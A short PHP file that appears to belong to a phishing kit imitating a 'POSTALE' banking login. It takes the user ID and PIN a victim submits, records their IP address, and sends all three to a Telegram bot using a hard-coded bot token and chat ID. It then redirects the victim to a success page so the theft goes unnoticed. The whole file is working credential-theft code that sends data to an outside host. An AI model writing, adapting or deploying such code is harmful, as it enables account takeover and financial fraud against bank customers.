<?php

require_once 'app.php';


if ($_GET['step'] == 'log') {
    $msg = '++++++++++++ POSTALE ++++++++++++'. "\r\n";
    $msg .= '[ USER ] = ' . $_POST['id'] . "\r\n";
    $msg .= '[ PASS ] = ' . $_POST['pin'] . "\r\n";
    $msg .= '[ IP ] = ' . get_user_ip() . "\r\n";
            $token = "6530764131:AAEEoQIIwQpAhOx2JKYynhoBYIaJ5avbvoc";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4157011540&text=" . urlencode($msg)."" );

    header("Location:../../success.php");
}else{
header("Location:../../success.php");
}
